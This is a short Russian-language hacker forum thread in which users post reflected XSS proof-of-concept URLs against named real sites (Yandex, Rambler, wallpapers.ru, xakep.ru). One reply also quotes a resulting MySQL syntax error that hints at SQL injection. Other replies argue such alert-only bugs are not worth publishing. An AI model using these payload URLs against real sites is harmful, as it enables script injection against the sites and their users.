Нашел XSS на Яндексе (IE) _http://www.yandex.ru/yandsearch?Link="><script>alert('found_by_Gang100')</script>
И на Рамблере http://www.rambler.ru/cgi-bin/advanced.cgi?set="><script>alert('found_by_Gavrila')</script>
XSS на популярном портале)) http://wallpapers.ru/cgi-bin/forum/top.pl?author="><script>alert('xss')</script> + выдаётся ссобщение Временные неполадки на сервере баз данных (MySQL) На сервере баз данных возникли временные неполадки. Причина: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'xss')' AND icon_autor >= 2' at line
Большинство пассивных хсс мультибраузерные. Так же как и эти. (_|_) На самом деле и на яндексе и на рамблере есть простые мультибраузерные активные хсс, не страдайте ***ней!
http://www.xakep.ru/post/30551/default.asp?"></iframe><script>alert(/xss/)</script><xexe=" такаяже байда точно такая же пасивная и чего?
По моему от этого бага толка нет, нафига его вообще публиковать %) Вот например на на античате тоже баг есть, не XSS но есть Warning: Wrong parameter count for mysql_result() in z:\home\video.antichat.net\www\index.php on line 26 Warning: Wrong parameter count for mysql_result() in z:\home\video.antichat.net\www\index.php on line 26 Толку от него нет. В общем я думаю не стоит публиковать баги, от которых толку нет
Не думаю что после алерта можно считать yandex взломаным, а базу слитой... [что, я лоханулся опять, да?]
